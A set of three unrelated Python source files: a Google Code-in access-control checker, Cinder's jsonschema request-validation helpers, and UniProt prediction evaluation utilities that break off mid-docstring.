# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Access control helper.
See soc.views.helper.access module.
"""
__authors__ = [
'"Madhusudan.C.S" <madhusudancs@gmail.com>',
'"Daniel Hans" <daniel.m.hans@gmail.com>',
'"Lennard de Rijk" <ljvderijk@gmail.com>',
'"Pawel Solyga" <pawel.solyga@gmail.com>',
]
from django.utils.translation import ugettext
from soc.logic.helper import timeline as timeline_helper
from soc.logic.models import host as host_logic
from soc.logic.models import user as user_logic
from soc.views import out_of_band
from soc.views.helper import access
from soc.modules.gci.logic.models import mentor as gci_mentor_logic
from soc.modules.gci.logic.models import organization as gci_org_logic
from soc.modules.gci.logic.models import org_admin as gci_org_admin_logic
from soc.modules.gci.logic.models import program as gci_program_logic
from soc.modules.gci.logic.models import task as gci_task_logic
DEF_ALREADY_CLAIMED_A_TASK = ugettext(
'You have already claimed a task and can therefore not become a mentor '
'or org admin.')
DEF_CANT_EDIT_MSG = ugettext(
'This task cannot be edited since it has been claimed at least '
'once before.')
DEF_CANT_REGISTER = ugettext(
'You have not completed your first task to register as a student. ')
DEF_MAX_TASKS_REACHED_MSG = ugettext(
'You have reached the maximum number of Tasks allowed '
'for your organization for this program.')
DEF_NEED_ROLE_MSG = ugettext(
'You do not have the required role.')
DEF_NO_ACTIVE_ENTITY_MSG = ugettext(
'There is no such active entity.')
DEF_NO_FILE_ACCESS_MSG = ugettext(
'You do not have the necessary privileges to access this file.')
DEF_NO_FILE_SPECIFIED_MSG = ugettext(
'File to download is not specified')
DEF_NO_PUB_TASK_MSG = ugettext(
'There is no such published task.')
DEF_PAGE_INACTIVE_MSG = ugettext(
'This page is inactive at this time.')
DEF_SIGN_UP_AS_OA_MENTOR_MSG = ugettext(
'You first need to sign up as an Org Admin or a Mentor.')
DEF_NO_TASKS_AFFILIATED = ugettext(
'There are no tasks affiliated to you.')
DEF_UNEXPECTED_ERROR = ugettext(
'An unexpected error occurred please file an issue report, make sure you '
'note the URL.')
DEF_ORG_HAS_TASKS = ugettext(
'The organization has at least one task which may be claimed.')
class GCIChecker(access.Checker):
"""See soc.views.helper.access.Checker.
"""
@access.allowDeveloper
@access.denySidebar
def checkCanOrgAdminOrMentorEdit(self, django_args,
key_location, check_limit):
"""Checks if the mentors can create task for this program,
and obeys the task quota limit assigned for their org when check_limit is
True.
Args:
django_args: a dictionary with django's arguments.
key_location: the key for django_args in which the key_name
of the org is stored.
check_limit: iff true checks if the organization reached the
task quota limit for the given program.
"""
import settings
self.checkIsUser(django_args)
user_account = user_logic.logic.getCurrentUser()
if key_location not in django_args:
raise out_of_band.AccessViolation(
message_fmt=DEF_NEED_ROLE_MSG)
filter = {
'user': user_account,
'scope_path': django_args[key_location],
'status': 'active'
}
role_entity = gci_org_admin_logic.logic.getForFields(filter, unique=True)
if not role_entity:
role_entity = gci_mentor_logic.logic.getForFields(filter, unique=True)
if not role_entity:
raise out_of_band.AccessViolation(
message_fmt=DEF_SIGN_UP_AS_OA_MENTOR_MSG)
# pylint: disable=E1103
program_entity = role_entity.program
if not timeline_helper.isActivePeriod(program_entity.timeline, 'program'):
raise out_of_band.AccessViolation(message_fmt=DEF_PAGE_INACTIVE_MSG)
# pylint: disable=E1103
org_entity = role_entity.scope
if settings.GCI_TASK_QUOTA_LIMIT_ENABLED and check_limit:
# count all tasks from this organization
fields = {'scope': org_entity}
task_query = gci_task_logic.logic.getQueryForFields(fields)
if task_query.count() >= org_entity.task_quota_limit:
# too many tasks access denied
raise out_of_band.AccessViolation(
message_fmt=DEF_MAX_TASKS_REACHED_MSG)
if 'link_id' in django_args:
task_entity = gci_task_logic.logic.getFromKeyFieldsOr404(django_args)
if task_entity.status not in ['Unapproved', 'Unpublished', 'Open',
'ClaimRequested', 'Reopened']:
# task is claimed at least once
raise out_of_band.AccessViolation(message_fmt=DEF_CANT_EDIT_MSG)
return
@access.allowDeveloper
@access.denySidebar
def checkRoleAndStatusForTask(self, django_args, allowed_roles,
role_status, task_status):
"""Checks if the current user has access to the given task.
This method checks if the current user is in one of the allowed_roles
and has specified role_status, If yes, allows him to access the Task page.
Args:
django_args: a dictionary with django's arguments
allowed_roles: list with names for the roles allowed to pass access check
role_status: list with states allowed for the role
task_status: a list with states allowed for the task
Raises:
AccessViolationResponse:
- If there is no task found
- If the task is not in one of the required states.
- If the user does not have any of the required roles
"""
self.checkIsUser(django_args)
if 'link_id' in django_args:
# bail out with 404 if no task is found
task_entity = gci_task_logic.logic.getFromKeyFieldsOr404(django_args)
if not task_entity.status in task_status:
# this task can not be accessed at the moment
raise out_of_band.AccessViolation(
message_fmt=DEF_NO_ACTIVE_ENTITY_MSG)
user_entity = self.user
filter = {
'user': user_entity,
'scope_path': django_args['scope_path'],
'status': role_status
}
if 'host' in allowed_roles:
# check if the current user is a host for this proposal's program
if host_logic.logic.getForFields(filter, unique=True):
return
if 'gci/org_admin' in allowed_roles:
# check if the current user is an admin for this task's org
if gci_org_admin_logic.logic.getForFields(filter, unique=True):
return
if 'gci/mentor' in allowed_roles:
# check if the current user is a mentor for this task's org
if gci_mentor_logic.logic.getForFields(filter, unique=True):
return
if 'public' in allowed_roles:
return
# no roles found, access denied
raise out_of_band.AccessViolation(message_fmt=DEF_NEED_ROLE_MSG)
@access.allowDeveloper
@access.denySidebar
def checkStatusForTask(self, django_args):
"""Checks if the current user has access to the given task.
This method checks if the current user is either an GCI Org Admin or a
Mentor and is active, if yes it allows them to view the task page at any
task state. If the user is none of the above, it checks the status of the
task, and if it is in one of the valid published states it allows access
to view the task page.
Args:
django_args: a dictionary with django's arguments
Raises:
AccessViolationResponse:
- If there is no task found
- If the task is not in one of the required states.
"""
user_entity = self.user
# bail out with 404 if no task is found
task_entity = gci_task_logic.logic.getFromKeyFieldsOr404(django_args)
if (user_entity and task_entity.user and
task_entity.user.key() == user_entity.key()):
return
filter = {
'user': user_entity,
'status': 'active',
}
if host_logic.logic.getForFields(filter, unique=True):
return
filter['scope_path'] = django_args['scope_path']
if gci_org_admin_logic.logic.getForFields(filter, unique=True):
return
if gci_mentor_logic.logic.getForFields(filter, unique=True):
return
org_entity = gci_org_logic.logic.getFromKeyNameOr404(
django_args['scope_path'])
if not timeline_helper.isAfterEvent(org_entity.scope.timeline,
'tasks_publicly_visible'):
raise out_of_band.AccessViolation(message_fmt=DEF_PAGE_INACTIVE_MSG)
if task_entity.status in ['Unapproved', 'Unpublished', 'Invalid']:
# this proposal can not be task at the moment
raise out_of_band.AccessViolation(
message_fmt=DEF_NO_PUB_TASK_MSG)
def checkCanApply(self, django_args):
"""Checks if the user has the completed at least one task to register as
a student.
Args:
django_args: a dictionary with django's arguments
Raises:
AccessViolationResponse:
- If student has not completed even a single task
"""
self.checkIsUser(django_args)
program_entity = gci_program_logic.logic.getFromKeyNameOr404(
django_args['scope_path'])
filter = {
'user': self.user,
'program': program_entity,
'status': 'AwaitingRegistration',
}
if gci_task_logic.logic.getForFields(filter, unique=True):
return
# no completed tasks found, access denied
raise out_of_band.AccessViolation(
message_fmt=DEF_CANT_REGISTER)
def checkCanOpenTaskList(self, django_args, role_logic, role):
"""Checks if the current user is allowed to see a list of his tasks.
Args:
django_args: a dictionary with django's arguments
role_logic: the specific role whose logic must be used to check
for the scope
role: name of the role for this check is performed
Raises:
AccessViolationResponse:
- if the user is not registered as a student; and
- if the user has not claimed a single task
"""
self.checkIsUser(django_args)
try:
return self.checkHasRoleForScope(django_args, role_logic)
except out_of_band.Error:
pass
program = gci_program_logic.logic.getFromKeyNameOr404(
django_args['scope_path'])
filter = {
'program': program,
}
if role == 'gci/student':
filter['user'] = self.user
elif role == 'gci/mentor':
mentor_filter = {
'user': self.user,
'program': program,
'status': 'active'
}
mentor_entity = role_logic.getForFields(mentor_filter, unique=True)
filter['mentors'] = [mentor_entity]
if not gci_task_logic.logic.getForFields(filter, unique=True):
raise out_of_band.AccessViolation(message_fmt=DEF_NO_TASKS_AFFILIATED)
def checkTimelineFromTaskScope(self, django_args, status, period_name):
"""Checks the timeline for the program found in the scope variable of a
Task.
Args:
django_args: a dictionary with django's arguments
status: one of three strings, during which calls isActivePeriod(),
before which calls isBeforeEvent() and after which calls
isAfterEvent().
period_name: the name of the period to check the timeline for.
Raises:
AccessViolationResponse:
- if the program is not in a valid state
- if the period specified does not pass the required status check
"""
org_entity = gci_org_logic.logic.getFromKeyNameOr404(
django_args['scope_path'])
program_args = {'scope_path': org_entity.scope_path}
if status is 'during':
return self.checkIsActivePeriod(program_args, period_name,
'scope_path', gci_program_logic.logic)
elif status is 'before':
return self.checkIsBeforeEvent(program_args, period_name,
'scope_path', gci_program_logic.logic)
elif status is 'after':
return self.checkIsAfterEvent(program_args, period_name,
'scope_path', gci_program_logic.logic)
# no right status set, but we can't give the user access
raise out_of_band.AccessViolation(message_fmt=DEF_UNEXPECTED_ERROR)
def checkIsNotStudentForProgramOfOrg(self, django_args, org_logic,
student_logic):
"""Extends the basic with one that checks whether the current user has
claimed a task in the program.
Args:
See Checker.checkIsNotStudentForProgramOfOrg().
"""
org_entity = super(GCIChecker, self).checkIsNotStudentForProgramOfOrg(
django_args, org_logic, student_logic)
fields = {
'user': self.user,
'program': org_entity.scope
}
if gci_task_logic.logic.getForFields(fields, unique=True):
raise out_of_band.AccessViolation(message_fmt=DEF_ALREADY_CLAIMED_A_TASK)
return org_entity
@access.allowDeveloper
def checkOrgHasNoOpenTasks(self, django_args):
"""Checks if the organization does not have any tasks which might be
claimed by students.
"""
org_entity = gci_org_logic.logic.getFromKeyFieldsOr404(django_args)
fields = {
'status': ['Open', 'Reopened'],
'scope': org_entity
}
if gci_task_logic.logic.getForFields(fields, unique=True):
raise out_of_band.AccessViolation(message_fmt=DEF_ORG_HAS_TASKS)
@access.allowDeveloper
@access.denySidebar
def checkCanDownloadConsentForms(self, django_args, student_logic,
forms_data):
"""Checks if the user is a student who can download the forms i.e.
the blobs he has requested.
Args:
django_args: a dictionary with django's arguments
student_logic: student logic used to look up student entity
forms_data: dictionary containing the data related to the forms
that student should upload and entities that store the form.
Raises:
AccessViolationResponse:
- If there are no forms uploaded for the student.
- If the logged in user is not the one to whom the form belongs to.
"""
self.checkIsUser(django_args)
user_entity = self.user
try:
# if the current user is the program host no more access is required
if self.checkIsHostForProgramInScope(
django_args, gci_program_logic.logic):
return
except out_of_band.AccessViolation:
# if the user is not the host proceed for other checks
# NOTE: This is not combined with the following exception because
# if we catch AccessViolation there the access check for blob key
# being null which raises the same exception will also be caught
pass
filter = {
'user': user_entity,
'status': 'active',
'scope_path': django_args['scope_path'],
'link_id': django_args['link_id'],
}
student_entity = student_logic.getForFields(filter, unique=True)
try:
form_type = django_args['GET'].get('type', '')
blob_key = django_args['GET'].get('key', '')
if not blob_key:
raise out_of_band.AccessViolation(
message_fmt=DEF_NO_FILE_SPECIFIED_MSG)
form_entity_name = forms_data.get(form_type, '')
form_entity = getattr(student_entity, form_entity_name)
if blob_key == str(form_entity.key()):
return
except AttributeError:
pass
raise out_of_band.AccessViolation(message_fmt=DEF_NO_FILE_ACCESS_MSG)
| |
# Copyright (C) 2017 NTT DATA
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Internal implementation of request Body validating middleware.
"""
import base64
import re
import jsonschema
from jsonschema import exceptions as jsonschema_exc
from oslo_utils import timeutils
from oslo_utils import uuidutils
import six
import webob.exc
from cinder import db
from cinder import exception
from cinder.i18n import _
from cinder.objects import fields as c_fields
from cinder import quota
from cinder import utils
QUOTAS = quota.QUOTAS
GROUP_QUOTAS = quota.GROUP_QUOTAS
NON_QUOTA_KEYS = quota.NON_QUOTA_KEYS
def _soft_validate_additional_properties(
validator, additional_properties_value, param_value, schema):
"""Validator function.
If there are not any properties on the param_value that are not specified
in the schema, this will return without any effect. If there are any such
extra properties, they will be handled as follows:
- if the validator passed to the method is not of type "object", this
method will return without any effect.
- if the 'additional_properties_value' parameter is True, this method will
return without any effect.
- if the schema has an additionalProperties value of True, the extra
properties on the param_value will not be touched.
- if the schema has an additionalProperties value of False and there
aren't patternProperties specified, the extra properties will be stripped
from the param_value.
- if the schema has an additionalProperties value of False and there
are patternProperties specified, the extra properties will not be
touched and raise validation error if pattern doesn't match.
"""
if (not validator.is_type(param_value, "object") or
additional_properties_value):
return
properties = schema.get("properties", {})
patterns = "|".join(schema.get("patternProperties", {}))
extra_properties = set()
for prop in param_value:
if prop not in properties:
if patterns:
if not re.search(patterns, prop):
extra_properties.add(prop)
else:
extra_properties.add(prop)
if not extra_properties:
return
if patterns:
error = "Additional properties are not allowed (%s %s unexpected)"
if len(extra_properties) == 1:
verb = "was"
else:
verb = "were"
yield jsonschema_exc.ValidationError(
error % (", ".join(repr(extra) for extra in extra_properties),
verb))
else:
for prop in extra_properties:
del param_value[prop]
def _validate_string_length(value, entity_name, mandatory=False,
min_length=0, max_length=None,
remove_whitespaces=False):
"""Check the length of specified string.
:param value: the value of the string
:param entity_name: the name of the string
:mandatory: string is mandatory or not
:param min_length: the min_length of the string
:param max_length: the max_length of the string
:param remove_whitespaces: True if trimming whitespaces is needed
else False
"""
if not mandatory and not value:
return True
if mandatory and not value:
msg = _("The '%s' can not be None.") % entity_name
raise webob.exc.HTTPBadRequest(explanation=msg)
if remove_whitespaces:
value = value.strip()
utils.check_string_length(value, entity_name,
min_length=min_length,
max_length=max_length)
@jsonschema.FormatChecker.cls_checks('date-time')
def _validate_datetime_format(param_value):
try:
timeutils.parse_isotime(param_value)
except ValueError:
return False
else:
return True
@jsonschema.FormatChecker.cls_checks('name', exception.InvalidName)
def _validate_name(param_value):
if not param_value:
msg = _("The 'name' can not be None.")
raise exception.InvalidName(reason=msg)
elif len(param_value.strip()) == 0:
msg = _("The 'name' can not be empty.")
raise exception.InvalidName(reason=msg)
return True
@jsonschema.FormatChecker.cls_checks('name_skip_leading_trailing_spaces',
exception.InvalidName)
def _validate_name_skip_leading_trailing_spaces(param_value):
if not param_value:
msg = _("The 'name' can not be None.")
raise exception.InvalidName(reason=msg)
param_value = param_value.strip()
if len(param_value) == 0:
msg = _("The 'name' can not be empty.")
raise exception.InvalidName(reason=msg)
elif len(param_value) > 255:
msg = _("The 'name' can not be greater than 255 characters.")
raise exception.InvalidInput(reason=msg)
return True
@jsonschema.FormatChecker.cls_checks('uuid')
def _validate_uuid_format(instance):
return uuidutils.is_uuid_like(instance)
@jsonschema.FormatChecker.cls_checks('group_snapshot_status')
def _validate_status(param_value):
if len(param_value.strip()) == 0:
msg = _("The 'status' can not be empty.")
raise exception.InvalidGroupSnapshotStatus(reason=msg)
elif param_value.lower() not in c_fields.GroupSnapshotStatus.ALL:
msg = _("Group snapshot status: %(status)s is invalid, "
"valid statuses are: "
"%(valid)s.") % {'status': param_value,
'valid': c_fields.GroupSnapshotStatus.ALL}
raise exception.InvalidGroupSnapshotStatus(reason=msg)
return True
@jsonschema.FormatChecker.cls_checks('progress')
def _validate_progress(progress):
if progress:
try:
integer = int(progress[:-1])
except ValueError:
msg = _('progress must be an integer percentage')
raise exception.InvalidInput(reason=msg)
if integer < 0 or integer > 100 or progress[-1] != '%':
msg = _('progress must be an integer percentage between'
' 0 and 100')
raise exception.InvalidInput(reason=msg)
return True
@jsonschema.FormatChecker.cls_checks('base64')
def _validate_base64_format(instance):
try:
if isinstance(instance, six.text_type):
instance = instance.encode('utf-8')
base64.decodestring(instance)
except base64.binascii.Error:
return False
except TypeError:
# The name must be string type. If instance isn't string type, the
# TypeError will be raised at here.
return False
return True
@jsonschema.FormatChecker.cls_checks('disabled_reason')
def _validate_disabled_reason(param_value):
_validate_string_length(param_value, 'disabled_reason',
mandatory=False, min_length=1, max_length=255,
remove_whitespaces=True)
return True
@jsonschema.FormatChecker.cls_checks('quota_set')
def _validate_quota_set(quota_set):
bad_keys = []
for key, value in quota_set.items():
if (key not in QUOTAS and key not in GROUP_QUOTAS and key not in
NON_QUOTA_KEYS):
bad_keys.append(key)
continue
if key in NON_QUOTA_KEYS:
continue
utils.validate_integer(value, key, min_value=-1,
max_value=db.MAX_INT)
if len(bad_keys) > 0:
msg = _("Bad key(s) in quota set: %s") % ", ".join(bad_keys)
raise exception.InvalidInput(reason=msg)
return True
@jsonschema.FormatChecker.cls_checks('quota_class_set')
def _validate_quota_class_set(instance):
bad_keys = []
for key in instance:
if key not in QUOTAS and key not in GROUP_QUOTAS:
bad_keys.append(key)
if len(bad_keys) > 0:
msg = _("Bad key(s) in quota class set: %s") % ", ".join(bad_keys)
raise exception.InvalidInput(reason=msg)
return True
@jsonschema.FormatChecker.cls_checks(
'group_status', webob.exc.HTTPBadRequest)
def _validate_group_status(param_value):
if param_value is None:
msg = _("The 'status' can not be None.")
raise webob.exc.HTTPBadRequest(explanation=msg)
if len(param_value.strip()) == 0:
msg = _("The 'status' can not be empty.")
raise exception.InvalidGroupStatus(reason=msg)
if param_value.lower() not in c_fields.GroupSnapshotStatus.ALL:
msg = _("Group status: %(status)s is invalid, valid status "
"are: %(valid)s.") % {'status': param_value,
'valid': c_fields.GroupStatus.ALL}
raise exception.InvalidGroupStatus(reason=msg)
return True
@jsonschema.FormatChecker.cls_checks('availability_zone')
def _validate_availability_zone(param_value):
if param_value is None:
return True
_validate_string_length(param_value, "availability_zone",
mandatory=True, min_length=1,
max_length=255, remove_whitespaces=True)
return True
@jsonschema.FormatChecker.cls_checks(
'group_type', (webob.exc.HTTPBadRequest, exception.InvalidInput))
def _validate_group_type(param_value):
_validate_string_length(param_value, 'group_type',
mandatory=True, min_length=1, max_length=255,
remove_whitespaces=True)
return True
class FormatChecker(jsonschema.FormatChecker):
"""A FormatChecker can output the message from cause exception
We need understandable validation errors messages for users. When a
custom checker has an exception, the FormatChecker will output a
readable message provided by the checker.
"""
def check(self, param_value, format):
"""Check whether the param_value conforms to the given format.
:argument param_value: the param_value to check
:type: any primitive type (str, number, bool)
:argument str format: the format that param_value should conform to
:raises: :exc:`FormatError` if param_value does not conform to format
"""
if format not in self.checkers:
return
# For safety reasons custom checkers can be registered with
# allowed exception types. Anything else will fall into the
# default formatter.
func, raises = self.checkers[format]
result, cause = None, None
try:
result = func(param_value)
except raises as e:
cause = e
if not result:
msg = "%r is not a %r" % (param_value, format)
raise jsonschema_exc.FormatError(msg, cause=cause)
class _SchemaValidator(object):
"""A validator class
This class is changed from Draft4Validator to validate minimum/maximum
value of a string number(e.g. '10'). This changes can be removed when
we tighten up the API definition and the XML conversion.
Also FormatCheckers are added for checking data formats which would be
passed through cinder api commonly.
"""
validator = None
validator_org = jsonschema.Draft4Validator
def __init__(self, schema, relax_additional_properties=False):
validators = {
'minimum': self._validate_minimum,
'maximum': self._validate_maximum,
}
if relax_additional_properties:
validators[
'additionalProperties'] = _soft_validate_additional_properties
validator_cls = jsonschema.validators.extend(self.validator_org,
validators)
format_checker = FormatChecker()
self.validator = validator_cls(schema, format_checker=format_checker)
def validate(self, *args, **kwargs):
try:
self.validator.validate(*args, **kwargs)
except jsonschema.ValidationError as ex:
if isinstance(ex.cause, exception.InvalidName):
detail = ex.cause.msg
elif len(ex.path) > 0:
detail = _("Invalid input for field/attribute %(path)s."
" Value: %(value)s. %(message)s") % {
'path': ex.path.pop(), 'value': ex.instance,
'message': ex.message
}
else:
detail = ex.message
raise exception.ValidationError(detail=detail)
except TypeError as ex:
# NOTE: If passing non string value to patternProperties parameter,
# TypeError happens. Here is for catching the TypeError.
detail = six.text_type(ex)
raise exception.ValidationError(detail=detail)
def _number_from_str(self, param_value):
try:
value = int(param_value)
except (ValueError, TypeError):
try:
value = float(param_value)
except (ValueError, TypeError):
return None
return value
def _validate_minimum(self, validator, minimum, param_value, schema):
param_value = self._number_from_str(param_value)
if param_value is None:
return
return self.validator_org.VALIDATORS['minimum'](validator, minimum,
param_value, schema)
def _validate_maximum(self, validator, maximum, param_value, schema):
param_value = self._number_from_str(param_value)
if param_value is None:
return
return self.validator_org.VALIDATORS['maximum'](validator, maximum,
param_value, schema)
| |
# coding=utf-8
# Copyright 2020 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Evaluation utilities for uniprot predictions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import copy
import itertools
from typing import Dict, FrozenSet, List, Optional, Sequence, Set, Text, Tuple, Union
import numpy as np
import pandas as pd
from pandas.core.groupby.generic import DataFrameGroupBy as pd_DataFrameGroupBy
import inference
import parenthood_lib
import sklearn.metrics
import tqdm
FALSE_NEGATIVES_KEY = 'false_negatives'
FALSE_POSITIVES_KEY = 'false_positives'
TRUE_POSITIVES_KEY = 'true_positives'
PrecisionRecallF1 = Tuple[float, float, float]
def normalize_confidences(
predictions, label_vocab,
applicable_label_dict):
"""Set confidences of parent labels to the max of their children.
Args:
predictions: [num_sequences, num_labels] ndarray.
label_vocab: list of vocab strings in an order that corresponds to
`predictions`.
applicable_label_dict: Mapping from labels to their parents (including
indirect parents).
Returns:
A numpy array [num_sequences, num_labels] with confidences where:
if label_vocab[k] in applicable_label_dict[label_vocab[j]],
then arr[i, j] >= arr[i, k] for all i.
"""
vocab_indices = {v: i for i, v in enumerate(label_vocab)}
children = parenthood_lib.reverse_map(applicable_label_dict,
set(vocab_indices.keys()))
# Only vectorize this along the sequences dimension as the number of children
# varies between labels.
label_confidences = []
for label in label_vocab:
child_indices = np.array(
[vocab_indices[child] for child in children[label]])
if child_indices.size > 1:
confidences = np.max(predictions[:, child_indices], axis=1)
label_confidences.append(confidences)
else:
label_confidences.append(predictions[:, vocab_indices[label]])
return np.stack(label_confidences, axis=1)
def get_ground_truth_multihots(label_sets,
label_vocab):
"""Get a multihot matrix from label sets and a vocab."""
vocab_indices = {v: i for i, v in enumerate(label_vocab)}
ground_truths = []
for s in label_sets:
indices = np.array([vocab_indices[v] for v in s], dtype=np.int32)
multihots = np.zeros([len(label_vocab)])
multihots[indices] = 1
ground_truths.append(multihots)
return np.vstack(ground_truths)
def get_pr_f1_df_from_arrays(
ground_truths,
normalized_predictions,
prediction_precision_limit = None,
):
"""Convenience method for making a PR curve dataframe.
Args:
ground_truths: multihot array of shape (num_examples, num_labels).
normalized_predictions: array of shape (num_samples, num_labels).
prediction_precision_limit: Used to truncate the predictions to a fixed
level of precision. Predictions are truncated to
`prediction_precision_limit` number of decimal places. This argument is
useful to increase the speed of computation, and also to decrease the size
of the dataframe returned. If None, no truncation is performed.
Returns:
pd.DataFrame with columns precision (float); recall (float);
threshold (float); f1 (float).
"""
if prediction_precision_limit:
normalized_predictions = np.around(normalized_predictions,
prediction_precision_limit)
precisions, recalls, thresholds = sklearn.metrics.precision_recall_curve(
ground_truths.flatten(), normalized_predictions.flatten())
# Throw away last precision and recall as they are always 0 and 1
# respectively, and have no associated threshold
precisions = precisions[:-1]
recalls = recalls[:-1]
f1s = 2 * (precisions * recalls) / (precisions + recalls)
return pd.DataFrame(
data={
'precision': precisions,
'recall': recalls,
'threshold': thresholds,
'f1': f1s
})
def get_pr_f1_df(
prediction_df,
label_vocab,
label_normalizer,
eval_vocab = None,
prediction_precision_limit = 18,
):
"""Make a dataframe with each possible threshold and it's corresponding values.
Args:
prediction_df: A dataframe with columns `predictions` and `true_label`.
label_vocab: A list of labels.
label_normalizer: A mapping from labels to their children.
eval_vocab: An optional subset of `label_vocab` on which to restrict
analysis.
prediction_precision_limit: Used to truncate the predictions to a fixed
level of precision. Predictions are truncated to
`prediction_precision_limit` number of decimal places. This argument is
useful to increase the speed of computation, and also to decrease
the size of the dataframe returned. If None, no truncation is performed.
Returns:
A dataframe with 4 columns; precision, recall, f1, and threshold. At each
threshold precision, recall, and f1 are calculated relative to the
normalized confidences and true labels given in `prediction_df`.
"""
if not eval_vocab:
eval_vocab = set(label_vocab)
label_vocab = np.array(label_vocab)
prediction_array = np.vstack(prediction_df.predictions)
normalized_predictions = normalize_confidences(prediction_array, label_vocab,
label_normalizer)
true_label_sets = prediction_df.true_label.apply(
eval_vocab.intersection).values
eval_indices = np.array(
[i for i, v in enumerate(label_vocab) if v in eval_vocab])
ground_truths = get_ground_truth_multihots(true_label_sets,
label_vocab[eval_indices])
return get_pr_f1_df_from_arrays(ground_truths,
normalized_predictions[:, eval_indices],
prediction_precision_limit)
def true_false_positive_negative_df(df):
"""Computes df of all example/label pairs, and whether they were correct.
Args:
df: pd.Dataframe that has columns: true_label. Contains a set of true
labels. predicted_label. Contains a set of true labels. sequence_name.
string. Accession.
Returns:
pd.DataFrame that has columns:
sequence_name. string. Name of sequence (accession).
class. string. Class name. Either predicted or true.
predicted. np.bool. Whether the class was predicted for the sequence.
true. np.bool. Whether the class label is true for the sequence.
true_positive. Whether the prediction is a true positive.
false_positive. Whether the prediction is a false positive.
false_negative. Whether the prediction is a false negative.
"""
dict_prep_for_df = {
'sequence_name': [],
'class': [],
'predicted': [],
'true': []
}
for _, row in tqdm.tqdm(df.iterrows(), position=0, total=len(df)):
all_classes = row.predicted_label.union(row.true_label)
for cls in all_classes:
dict_prep_for_df['sequence_name'].append(row.sequence_name)
dict_prep_for_df['class'].append(cls)
dict_prep_for_df['predicted'].append(cls in row.predicted_label)
dict_prep_for_df['true'].append(cls in row.true_label)
working_df = pd.DataFrame(dict_prep_for_df)
working_df.predicted = working_df.predicted.astype(np.bool)
working_df.true = working_df.true.astype(np.bool)
working_df['true_positive'] = working_df.predicted & working_df.true
working_df['false_positive'] = working_df.predicted & ~working_df.true
working_df['false_negative'] = ~working_df.predicted & working_df.true
return working_df
def multilabel_precision_per_example_label_pair(
df):
"""Computes precision score of predictions in dataframe.
Each (example, prediction) pair counts as "one" toward the precision. This is
different than counting each class equally, or counting each example evenly.
Args:
df: E.g. output of true_false_positive_negative_df that has columns
true_positive. bool. false_positive. bool.
Returns:
precision. Does not consider any thresholds.
"""
true_positive = df.true_positive.sum().astype(float)
false_positive = df.false_positive.sum().astype(float)
return true_positive / (true_positive + false_positive)
def multilabel_recall_per_example_label_pair(
df):
"""Computes f1 score of predictions in dataframe.
Each (example, prediction) pair counts as "one" toward the recall. This is
different than counting each class equally, or counting each example evenly.
Args:
df: E.g. output of true_false_positive_negative_df that has columns
true_positive. bool. false_negative. bool.
Returns:
recall. Does not consider any thresholds.
"""
true_positive = df.true_positive.sum().astype(float)
false_negative = df.false_negative.sum().astype(float)
return true_positive / (true_positive + false_negative)
def multilabel_f1_per_example_label_pair(
df):
"""Computes f1 score of predictions in dataframe.
Each (example, prediction) pair counts as "one" toward the f1 score. This is
different than counting each class equally, or counting each example evenly.
Args:
df: has columns: true_positive. bool. false_positive. bool. false_negative.
bool.
Returns:
f1 score. Harmonic mean of precision and recall. Does not consider any
thresholds.
"""
precision = multilabel_precision_per_example_label_pair(df)
recall = multilabel_recall_per_example_label_pair(df)
return 2. * (precision * recall) / (precision + recall)
def normalize_predictions(
to_normalize,
normalize_map):
normalized_non_flattened = [normalize_map[e] for e in to_normalize]
return frozenset(itertools.chain(*normalized_non_flattened)) # Flatten list.
def precision_recall_f1(
df,
label_normalizing_dict):
"""Returns precision, recall, and f1 for a dataframe.
Args:
df: pd.DataFrame with columns sequence_name, true__label, and
predicted_label.
label_normalizing_dict: dictionary of label to implied labels. Used to
normalize labels into canonical form (e.g. an obsolete label is normalized
into its replacement). See parenthood_lib.get_applicable_label_dict.
Returns:
PrecisionRecallF1.
"""
blast_prepped = pd.DataFrame()
blast_prepped['sequence_name'] = df.sequence_name
blast_prepped['predicted_label'] = df.predicted_label.apply(
lambda x: normalize_predictions(x, label_normalizing_dict))
blast_prepped['true_label'] = df.true_label
denormalized = true_false_positive_negative_df(blast_prepped)
precision = multilabel_precision_per_example_label_pair(denormalized)
recall = multilabel_recall_per_example_label_pair(denormalized)
f1 = multilabel_f1_per_example_label_pair(denormalized)
return precision, recall, f1
def filter_predictions_to_above_threshold(
predictions, decision_threshold,
label_vocab):
"""Computes predictions above `decision_threshold` for each example.
Args:
predictions: np.array, (2-d) of float. Outer dimension is example, inner
dimension is class label. I.e. predictions[2, 3] is the probability that
for example 2, the third class is true.
decision_threshold: float. Classes with predictions above this threshold
will be included in the output.
label_vocab: np.array (1-d) of string. List of classes that corresponds to
prediction.
Returns:
List of FrozenSet. Outer dimension is the example number within this batch,
inner is a set of labels predicted that have confidence over
decision_threshold.
"""
preds_per_sequence = []
for row in predictions:
preds_per_sequence.append(
frozenset(label_vocab[np.array(row) > decision_threshold]))
return preds_per_sequence
def get_predictions_above_threshold(
input_df,
inferrer,
decision_threshold,
label_vocab = None):
"""Return df of predictions above a threshold for each sequence.
Args:
input_df: pd.DataFrame with columns sequence_name, sequence.
inferrer: inferrer from a savedmodel model (see
protein_task.MultiDiscreteLabelProteinTask) with activation_type
'serving_default'.
decision_threshold: float. Classes with predictions above this threshold
will be included in the output.
label_vocab: A numpy array with the string labels in vocab order. If None,
